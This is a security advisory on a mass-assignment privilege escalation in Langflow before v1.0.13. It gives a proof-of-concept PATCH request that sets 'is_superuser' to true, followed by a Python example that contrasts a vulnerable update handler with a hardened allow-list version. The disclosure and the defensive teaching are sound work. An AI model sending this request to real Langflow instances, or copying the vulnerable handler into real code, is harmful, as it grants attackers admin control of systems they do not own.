Langflow Privilege Escalation through Mass Assignment

Langflow versions before v1.0.13 suffer from a Privilege Escalation vulnerability through Mass Assignment. By crafting a specific HTTP request to the users API endpoint, a remote and authenticated attacker with low privileges can obtain super admin privileges on the target Langflow instance.

Proof Of Concept:

In order to reproduce the issue, an attacker authenticated with low privileges on the application can send the following HTTP request: 

PATCH /api/v1/users/[USER_ID] HTTP/1.1
Host: localhost
Authorization: Bearer [TOKEN]
Content-Length: 21

{
  "is_superuser":true
}

The user can then verify that his privileges have been updated by accessing https://localhost/api/v1/users/whoami.
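
The update pattern behind this class of bug, next to a hardened version, as an added example that is not Langflow's code and not part of the original advisory. The User model, the field names other than is_superuser, and both handler functions are hypothetical.

```python
from dataclasses import dataclass, fields

# Assumed policy: fields a user may change on their own record vs. superuser-only fields.
SELF_EDITABLE = {"username", "profile_image"}
PRIVILEGED = {"is_superuser", "is_active"}


@dataclass
class User:  # hypothetical stand-in for the stored user row
    id: str
    username: str
    profile_image: str = ""
    is_active: bool = True
    is_superuser: bool = False


def update_user_vulnerable(caller: User, target: User, body: dict) -> User:
    """Mass assignment: every known key in the request body is copied onto the record."""
    if caller.id != target.id and not caller.is_superuser:
        raise PermissionError("cannot edit another user")
    known = {f.name for f in fields(User)}
    for key, value in body.items():
        if key in known:
            setattr(target, key, value)  # is_superuser is written like any other field
    return target


def update_user_hardened(caller: User, target: User, body: dict) -> User:
    """Allow-list per caller role; reject the request rather than silently dropping keys."""
    if caller.id != target.id and not caller.is_superuser:
        raise PermissionError("cannot edit another user")
    allowed = SELF_EDITABLE | (PRIVILEGED if caller.is_superuser else set())
    rejected = set(body) - allowed
    if rejected:
        raise PermissionError(f"fields not permitted for this caller: {sorted(rejected)}")
    for key, value in body.items():
        setattr(target, key, value)
    return target


if __name__ == "__main__":
    body = {"is_superuser": True}  # constructed body, same shape as the request above
    low = User(id="u1", username="alice")
    print(update_user_vulnerable(low, low, body).is_superuser)
    low = User(id="u1", username="alice")
    try:
        update_user_hardened(low, low, body)
    except PermissionError as exc:
        print("rejected:", exc)
```

Rejecting the whole request when it carries a non-permitted field, instead of ignoring that field, also gives the server a clear event to log and alert on.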

Rémy Marot

Tue, 07/30/2024 – 11:13